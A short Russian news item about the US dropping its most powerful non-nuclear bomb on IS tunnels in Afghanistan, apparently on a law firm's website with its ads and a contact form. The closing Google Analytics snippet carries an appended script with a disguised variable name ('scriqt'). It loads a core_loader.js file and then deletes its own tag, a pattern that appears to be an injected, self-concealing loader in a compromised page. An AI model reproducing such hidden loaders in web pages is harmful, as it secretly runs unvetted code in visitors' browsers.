США использовали в Афганистане самый мощный неядерный боеприпас — так называемую «мать всех бомб»

США использовали в Афганистане самый мощный неядерный боеприпас — так называемую «мать всех бомб»

О своем присутствии в азиатском регионе во всех смыслах громко решили заявить американцы. Они впервые применили в Афганистане свой самый мощный неядерный боеприпас - так называемую "мать всех бомб". Снаряд весом почти в 10 тонн сбросили с самолета на востоке страны - на бункеры и тоннели, которые используют боевики из запрещенной группировки ИГИЛ.

Что примечательно, эти объекты, как сообщил сегодня известный разоблачитель Эдвард Сноуден, в 80-х годах прошлого века были построены на деньги американских налогоплательщиков. Их возводили для моджахедов, которые воевали против советских войск.

Американский удар тем временем осудил бывший президент Афганистана Хамид Карзай. По его словам, Штаты используют страну как полигон для испытания новых видов оружия.
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');